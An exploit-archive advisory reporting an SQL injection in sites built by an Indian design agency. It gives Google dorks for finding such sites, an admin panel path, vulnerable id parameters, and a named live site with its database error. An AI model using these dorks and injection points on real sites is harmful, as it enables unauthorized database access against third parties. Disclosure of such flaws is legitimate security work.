################################################################################################# # Exploit Title : Designed By Catpops Technobiz Graphic Design Company in Raipur SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 01/10/2018 # Vendor Homepage : catpops.in # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Description of the Product from Catpops Graphic Design company in Raipur [ India ] Website Development & Much More At Catpops Technobiz, we’ve been helping clients succeed with gorgeous branding, web design and advertising since 2009. We’re trusted experts at logo design, website development, inbound marketing and graphic design in Raipur (C.G.). Catpops Technobiz is a world-class class design company, branding agency and graphic design, web design company & branding agency specialized in content strategy and user experience driven responsive website design and development, logo design and branding, inbound marketing, packaging design and advertising campaigns. We make clients look great again and again, using amazing design and custom lead generation strategies to generate unprecedented return on their investment! Graphics & Print Catpops Technobiz has an extensive in-house graphic design team. With their exceptional skills and talent, Catpops Technobiz can take an idea or concept and turn it into a powerful and effective piece of visual communication. Our talented graphic designers in India can also act as a back-end partner for clients with resource and time restrictions. Advertising agencies and large marketing departments the world-over use our graphic design team for design adaptations, new creatives, extending master concepts into different extensions, and for bulk layout operations – all at a fraction of the cost of local market rates. Complimenting the talented design team is a competitive free schedule. Catpops Technobiz can deliver quality end results without breaking the bank. ################################################################################################# # Google Dork : intext:''Designed By Catpops Technobiz'' intext:''Desgined By Catpops Technobiz'' # Admin Control Panel Path : /admin/index.php # SQL Injection Exploit : /read_articles.php?id=[SQL Injection] /read_article_details.php?id=[SQL Injection] ################################################################################################# # Example Vulnerable Site => holyhearts.in/read_article_details.php?id=2%27 => [ Proof of Concept ] => archive.fo/30VIU # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################